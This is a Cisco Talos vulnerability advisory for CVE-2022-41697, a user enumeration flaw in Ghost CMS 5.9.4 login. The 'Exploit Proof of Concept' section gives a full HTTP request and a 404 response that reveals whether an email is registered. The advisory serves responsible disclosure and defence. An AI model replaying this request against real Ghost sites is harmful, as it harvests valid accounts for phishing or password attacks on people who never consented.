Headline
CVE-2022-41697: TALOS-2022-1625 || Cisco Talos Intelligence Group
A user enumeration vulnerability exists in the login functionality of Ghost Foundation Ghost 5.9.4. A specially-crafted HTTP request can lead to a disclosure of sensitive information. An attacker can send a series of HTTP requests to trigger this vulnerability.
SUMMARY
A user enumeration vulnerability exists in the login functionality of Ghost Foundation Ghost 5.9.4. A specially-crafted HTTP request can lead to a disclosure of sensitive information. An attacker can send a series of HTTP requests to trigger this vulnerability.
CONFIRMED VULNERABLE VERSIONS
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Ghost Foundation Ghost 5.9.4
PRODUCT URLS
Ghost - http://www.ghost.org
CVSSv3 SCORE
5.3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CWE
CWE-204 - Response Discrepancy Information Exposure
DETAILS
Ghost is a content management system with tools to build a website, publish content and send newsletters. Ghost offers paid subscriptions to members and supports a number of integrations with external services.
A commonly overlooked vulnerabilty in web applications allows attackers to enumerate user accounts for an application. This type of vulnerabilty has minimal impact in general, as the attacker would still be required to guess a valid password. To mitigate bruteforce password attempts, Ghost leverages a third party library for maintaining access attempts and implements longer and longer timeout periods before allowing further requests from a host. Any system that uses email addresses for usernames allows attackers to still leverage the ability to enumerate valid users without directly targetting the authentication of the system. For example, it is trivial to harvest valid email addresses for an organization through other external means. If an organization is small enough, or the attacker is further able to narrow down potential users of the system, the attacker can use this type of attack to validate which users to attack using phishing attacks, exploit kits, etc.
OWASP - WSTG-IDNT-04
Exploit Proof of Concept
Request:
POST /ghost/api/admin/session HTTP/1.1
Host: localhost:3001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
X-Ghost-Version: 5.12
App-Pragma: no-cache
X-Requested-With: XMLHttpRequest
Content-Length: 64
Origin: http://localhost:3001
DNT: 1
Connection: close
Referer: http://localhost:3001/ghost/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"username":"[email protected]","password":"asdfasdfasdf"}
Response:
HTTP/1.1 404 Not Found
X-Powered-By: Express
Cache-Control: no-cache, private, no-store, must-revalidate, max-stale=0, post-check=0, pre-check=0
Access-Control-Allow-Origin: http://localhost:3001
Vary: Origin, Accept-Encoding
Content-Type: application/json; charset=utf-8
Content-Length: 227
ETag: W/"e3-u3gQCrLnLzZLBfGsRRRY7NHIbRI"
Date: Fri, 23 Sep 2022 20:39:45 GMT
Connection: close
{"errors":[{"message":"There is no user with that email address.","context":null,"type":"NotFoundError","details":null,"property":null,"help":null,"code":null,"id":"dbc5eba0-3b7f-11ed-927a-a985a499596d","ghostErrorCode":null}]}
TIMELINE
2022-10-26 - Vendor Disclosure
2022-10-26 - Initial Vendor Contact
2022-12-28 - Public Release
Dave McDaniel and other members of Cisco Talos.
Related news
Cybersecurity researchers have detailed two security flaws in the JavaScript-based blogging platform known as Ghost, one of which could be abused to elevate privileges via specially crafted HTTP requests. Tracked as CVE-2022-41654 (CVSS score: 8.5), the authentication bypass vulnerability that allows unprivileged users (i.e., members) to make unauthorized modifications to newsletter settings.
Dave McDaniel and other members of Cisco Talos discovered these vulnerabilities. Cisco Talos recently discovered two vulnerabilities in Ghost CMS, one authentication bypass vulnerability and one enumeration vulnerability. Ghost is a content management system with tools to build a website, publish content and send newsletters. Ghost offers paid subscriptions to